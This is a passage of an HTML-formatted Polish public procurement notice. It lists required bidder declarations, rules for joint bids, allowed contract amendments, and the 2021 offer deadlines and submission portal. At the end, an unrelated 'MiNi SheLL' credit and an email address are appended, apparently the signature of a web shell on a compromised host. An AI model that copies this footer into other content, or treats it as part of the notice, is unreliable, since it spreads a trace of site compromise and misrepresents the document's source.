SWZ.<br/>Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej,<br/>składa dokumenty zgodnie z § 4 Rozporządzenia Ministra Rozwoju, Pracy i Technologii w sprawie<br/>podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać<br/>zamawiający od wykonawcy.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) Pełnomocnictwo upoważniające do złożenia oferty - o ile ofertę składa pełnomocnik.<br/>2) Formularz ofertowy – do wykorzystania wzór, stanowiący Załącznik nr 2 do SWZ (podpisany<br/>kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym).<br/>3) Oświadczenie Wykonawcy o niepodleganiu wykluczeniu z postępowania – wzór oświadczenia<br/>o niepodleganiu wykluczeniu stanowi Załącznik nr 3 do SWZ. W przypadku wspólnego<br/>ubiegania się o zamówienie przez Wykonawców, oświadczenie o niepoleganiu wykluczeniu<br/>składa każdy z Wykonawców (podpisany kwalifikowanym podpisem elektronicznym lub<br/>podpisem zaufanym lub podpisem osobistym). Jeżeli Wykonawca polega na zdolnościach lub<br/>sytuacji innych podmiotów, powyższe oświadczenie składa również ten podmiot.<br/>4) Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu – wzór<br/>oświadczenia stanowi Załącznik nr 4 do SWZ. W przypadku wspólnego ubiegania się o<br/>zamówienie przez Wykonawców, oświadczenie o spełnianiu warunków udziału w postępowania<br/>składa każdy z Wykonawców. Oświadczenie to potwierdza spełnienie warunków udziału w<br/>postępowaniu w zakresie, w którym każdy z Wykonawców wykazuje spełnianie warunków<br/>udziału w postępowaniu (podpisany kwalifikowanym podpisem elektronicznym lub podpisem<br/>zaufanym lub podpisem osobistym). Jeżeli Wykonawca polega na zdolnościach lub sytuacji<br/>innych podmiotów, powyższe oświadczenie składa również ten podmiot, w zakresie, w jakim<br/>Wykonawca powołuje się na jego zasoby.<br/>5) Zobowiązanie podmiotu trzeciego – jeżeli dotyczy. Składa Wykonawca w przypadku, gdy<br/>polega na zdolnościach lub sytuacji podmiotu udostępniającego zasoby (propozycja<br/>zobowiązania stanowi Załącznik nr 6 do SWZ). Dokument należy złożyć w postaci elektronicznej<br/>podpisany kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem<br/>osobistym przez podmiot udostępniający. Wykonawca, który powołuje się na zasoby podmiotów<br/>udostępniających zasoby, w celu wykazania braku istnienia wobec nich podstaw wykluczenia<br/>oraz spełniania, w zakresie w jakim powołuje się na ich zasoby, warunków udziału w<br/>postępowaniu składa również dokumenty wskazane w pkt. 3) i 4) (Załącznik nr 3 i 4 do SWZ).<br/>7) Oświadczenie Wykonawców występujących wspólnie, z którego będzie wynikało, które<br/>dostawy wykonają poszczególni Wykonawcy (podpisane kwalifikowanym podpisem<br/>elektronicznym lub podpisem zaufanym lub podpisem osobistym) – jeżeli dotyczy. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia w rozumieniu art. 58 ustawy<br/>pzp. Zamawiający dopuszcza możliwość składania oferty przez dwóch lub więcej Wykonawców<br/>pod warunkiem, że spełnione będą następujące wymagania:<br/>1) Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika. Treść<br/>pełnomocnictwa musi jednoznacznie wskazywać czynności, do wykonywania, których<br/>pełnomocnik jest upoważniony. W przypadku, gdyby pełnomocnictwa udzielała osoba inna niż<br/>uprawniona do reprezentowania podmiotu z mocy prawa lub Umowy spółki, należy dołączyć do<br/>oferty również pełnomocnictwa do dokonania tej czynności;<br/>2) pełnomocnictwo do reprezentowania Wykonawców w postępowaniu albo reprezentowania<br/>Wykonawców w postępowaniu i zawarcia Umowy w sprawie zamówienia publicznego, w<br/>przypadku, gdy Wykonawcy wspólnie ubiegają się o udzielenie zamówienia należy złożyć w<br/>formie oryginału podpisanego podpisem kwalifikowanym, podpisem zaufanym lub podpisem<br/>osobistym lub kopii potwierdzonej notarialnie;<br/>3) W przypadku gdy pełnomocnictwo, o którym mowa w ust. 2) zostało sporządzone jako<br/>dokument w postaci papierowej i opatrzone własnoręcznym podpisem, przekazuje się cyfrowe<br/>odwzorowanie tego dokumentu opatrzone kwalifikowanym podpisem elektronicznym, podpisem<br/>zaufanym lub podpisem osobistym, potwierdzającym zgodność odwzorowania cyfrowego z<br/>dokumentem w postaci papierowej.<br/>4) Potwierdzenia zgodności odwzorowania cyfrowego z dokumentem w postaci papierowej, o<br/>którym mowa w pkt 3) dokonuje notariusz lub pełnomocnik.<br/>5) pełnomocnictwo to powinno wyraźnie wskazywać:<br/>a) jakiego postępowania dotyczy,<br/>b) jakie podmioty występują wspólnie,<br/>c) kto w imieniu tych podmiotów ma pełnić funkcję pełnomocnika,<br/>d) jakie konkretne czynności w postępowaniu ma prawo wykonywać pełnomocnik,<br/>e) na jaki okres jest udzielone.<br/>6) jeżeli pełnomocnik ma być uprawniony do wykonywania czynności nie tylko w imieniu<br/>wszystkich Wykonawców występujących wspólnie, lecz również w imieniu każdego z tych<br/>Wykonawców z osobna, to należy taką informację zamieścić w treści pełnomocnictwa.<br/>7) Żaden z Wykonawców występujących wspólnie nie może podlegać wykluczeniu z<br/>postępowania, spełnienie warunków udziału w postępowaniu w stosunku do Wykonawców<br/>występujących wspólnie będzie oceniane łącznie.<br/>8) Wykonawcy, którzy złożyli ofertę wspólną odpowiadają solidarnie za realizację zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zmiana Umowy dopuszczalna jest w zakresie i na warunkach przewidzianych przepisami Pzp.<br/>2. Stosownie do art. 455 ust. 1 pkt 1 Pzp, Zamawiający przewiduje możliwość wprowadzenia do<br/>Umowy zmian opisanych w ustępach poniżej:<br/>1) w przypadku zmiany przepisów prawa, opublikowanej w Dzienniku Urzędowym Unii<br/>Europejskiej, Dzienniku Ustaw, Monitorze Polskim lub Dzienniku Urzędowym odpowiedniego<br/>ministra, Zamawiający dopuszcza zmiany sposobu realizacji Umowy lub zmiany zakresu<br/>świadczeń Wykonawcy wymuszone takimi zmianami prawa;<br/>2) wystąpienia siły wyższej, o której mowa w § 10 Umowy - w zakresie dostosowania niniejszej<br/>Umowy do zmian nią spowodowanych;<br/>3) gdy po podpisaniu Umowy powstały nowe, nieznane w chwili podpisywania Umowy i<br/>korzystniejsze dla Zamawiającego rozwiązania techniczne, możliwe jest zastąpienie<br/>wymaganych rozwiązań technicznych nowymi poprzez zmianę parametrów dostarczanego<br/>sprzętu lub jego zmianę o ile nie zwiększy to kwoty wynagrodzenia;<br/>4) w przypadku zaistnienia obiektywnych, niezależnych od Stron Umowy okoliczności,<br/>Zamawiający dopuszcza możliwość dostarczenia innych sprzętów lub sprzętów innych<br/>producentów niż zadeklarowane w ofercie, o parametrach nie gorszych niż zaoferowane w<br/>Ofercie Wykonawcy, bez zmiany wysokości ustalonego wynagrodzenia;<br/>5) zaistnienia okoliczności, których nie można było przewidzieć w momencie zawierania Umowy,<br/>uniemożliwiających lub znacznie utrudniających wykonanie przedmiotu Umowy zgodnie z<br/>Umową lub powodujących nieracjonalność lub niecelowość dalszej realizacji przedmiotu<br/>Umowy;<br/>6) zmiany terminu realizacji Umowy:<br/>a) w razie wystąpienia okoliczności niezależnych od Stron lub których Strony przy zachowaniu<br/>należytej staranności nie były w stanie uniknąć lub przewidzieć;<br/>b) gdy konieczne okaże się przedłużenie terminu dostawy, z przyczyn organizacyjnych leżących<br/>po stronie Zamawiającego<br/>- nie dłużej jednak niż o 10 dni (kalendarzowych) w ww. przypadkach;<br/>7) w przypadku samodzielnej realizacji zamówienia przez Wykonawcę Zamawiający przewiduje<br/>możliwość przystąpienia do zobowiązania podwykonawców. Wykonawca zobowiązany będzie<br/>do podania zakresu udziału podwykonawców i powodów włączenia ich do realizacji Umowy.<br/>3. Zmiany nie mogą naruszać postanowień zawartych w art. 455 ustawy Pzp.<br/>4. Strony są uprawnione do wprowadzenia do Umowy zmian nieistotnych, to jest innych, niż<br/>zmiany zdefiniowane w art. 454 ust. 2 ustawy Pzp.<br/>5. Wszelkie zmiany Umowy wymagają formy pisemnej pod rygorem nieważności, za wyjątkiem<br/>zmiany osób i adresów, o których mowa w § 9 projektowanych postanowień Umowy, które to<br/>zmiany nie wymagają sporządzenia aneksu, a jedynie pisemnego poinformowania drugiej Strony<br/>(również za pomocą e-maila). <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-09-27 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ideas-ncbr.eb2b.com.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-09-27 14:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-10-26</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com